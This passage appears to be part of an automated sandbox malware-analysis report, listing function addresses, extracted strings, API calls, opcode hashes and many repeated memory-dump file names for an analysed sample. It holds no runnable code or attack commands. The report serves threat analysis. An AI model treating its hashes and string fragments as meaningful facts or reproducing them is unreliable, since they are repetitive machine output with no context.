Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: 2h?n$7$SP$^`/4$gfff
API String ID: 0-3257051659
Opcode ID: b82114799dee2a803e56d1f6d2df0db2c0d240e4675bb97059d73775d87b1e57
Instruction ID: 1c49e581f5b49cba56a80798ed26a5b9479523d6d3272b0b276a0def86e86181
Opcode Fuzzy Hash: b82114799dee2a803e56d1f6d2df0db2c0d240e4675bb97059d73775d87b1e57
Instruction Fuzzy Hash: ADA15876A143504BD314CF28CC517AFB7E2FBC5324F198A3DE895D7391EA3888429782

Function 00F21340 Relevance: 5.5, Strings: 4, Instructions: 493COMMON

Download Yara Rule

Strings

eb, xrefs: 00F216F6
9deZ, xrefs: 00F21818
sp, xrefs: 00F21528
{s, xrefs: 00F21520

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: 9deZ$eb$sp${s
API String ID: 0-3993331145
Opcode ID: 66feffb077bb44d093f4ec43039670cbaa5050b0c19564a697f08119a1b40377
Instruction ID: 34747cf6024e39d301e8a2014cccd50ca2896819cf3102aeae543611e1c1c7c6
Opcode Fuzzy Hash: 66feffb077bb44d093f4ec43039670cbaa5050b0c19564a697f08119a1b40377
Instruction Fuzzy Hash: 4BD128B16183148BC724DF24D89166BB7F2FFE5354F08CA1CE4968B3A0E7789904D786

Function 00F291AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 00F291DA

Strings

+Ku, xrefs: 00F292AF
wpq, xrefs: 00F292B7

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +Ku$wpq
API String ID: 237503144-1953850642
Opcode ID: 8fbc9b6091e4ed42636e94b552b62a8315af53e40b60da02034b80ef411f7672
Instruction ID: 8791fc745f368682c9a56a74a154101a50ab67fd7887bec17b4ae2b01bb460b7
Opcode Fuzzy Hash: 8fbc9b6091e4ed42636e94b552b62a8315af53e40b60da02034b80ef411f7672
Instruction Fuzzy Hash: 1751CD7260C3168FC324CF69984076FB7E6EBC5310F15892DE4EACB285DB74D50A9B92

Function 00F37DA9 Relevance: 5.4, Strings: 4, Instructions: 421COMMON

Download Yara Rule

Strings

], xrefs: 00F3824A
^, xrefs: 00F38246
_, xrefs: 00F38242
\, xrefs: 00F3824E

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: \$]$^$_
API String ID: 0-1726580471
Opcode ID: 06fe92804e664c32a91fddf392c9a05acdd4213fcb6e31ed290b459fbed6c3ed
Instruction ID: fb0263b87f8eaf210f1d7ca8c14b4fab6ca79d5d52b352583c7fa452dd37ae16
Opcode Fuzzy Hash: 06fe92804e664c32a91fddf392c9a05acdd4213fcb6e31ed290b459fbed6c3ed
Instruction Fuzzy Hash: 2D226C215087D5CED326CB3C8888B497F911B67324F0E82D9D4E95F3F3C6A9894AD762

Function 00F290D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00F29170

Strings

M/(, xrefs: 00F2919E
M/(, xrefs: 00F2913D

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: M/($M/(
API String ID: 237503144-1710806632
Opcode ID: 6915a39cfd569bbe293a826d01bc9a286a870df3fa77bc3936947d99e694185f
Instruction ID: 7f8e083ba97545a5c88d1875be96f4a49a007d431d2dffe2c317c8e79eccdf9e
Opcode Fuzzy Hash: 6915a39cfd569bbe293a826d01bc9a286a870df3fa77bc3936947d99e694185f
Instruction Fuzzy Hash: 67214371A4C3215FE710CE34A88179FB7AAEBC2700F01892CE4D1EB1C5D678880B8752

Function 00F2C9EB Relevance: 5.2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00F2C96F
EXCm, xrefs: 00F2C9FE
_^]\, xrefs: 00F2CA6F
EXCm, xrefs: 00F2C8F5

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: EXCm$EXCm$_^]\$_^]\
API String ID: 0-1657758763
Opcode ID: 333eb6157d3dc81020a4ceaceb59a39551c099085feff50ae5cf833a30db52d7
Instruction ID: b0ed14617e98713d1998558e6af1f8ac4ee99545c2288f34cda4ba8997677598
Opcode Fuzzy Hash: 333eb6157d3dc81020a4ceaceb59a39551c099085feff50ae5cf833a30db52d7
Instruction Fuzzy Hash: 975104705046A28BD725CF3980A0777BFD1AF67310F1DC5ACC4D78B652D634A985EB90

Function 00F2A5B6 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

VN, xrefs: 00F2A520
i, xrefs: 00F2A527
i, xrefs: 00F2A5CD
VN, xrefs: 00F2A5C6

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
